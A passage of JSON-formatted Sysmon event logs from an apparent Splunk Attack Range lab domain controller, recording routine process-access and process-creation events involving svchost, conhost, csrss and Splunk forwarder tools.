C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3152,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010FD500500}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010FD500500}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3153,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.308\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-0010BE510500}\r\nProcessId: 4556\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-0010FD500500}\r\nParentProcessId: 4544\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list httpServerListener: --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.308","ProcessGuid":"{41C8662E-1FF3-5F25-0000-0010BE510500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServerListener: --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-0010FD500500}","ParentProcessId":"4544","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list httpServerListener: --no-log","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3154,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010FD500500}\r\nSourceProcessId: 4544\r\nSourceThreadId: 4536\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010BE510500}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010FD500500}","SourceProcessId":"4544","SourceThreadId":"4536","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010BE510500}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3155,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010BE510500}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010BE510500}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3156,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3157,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3158,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3159,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3160,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 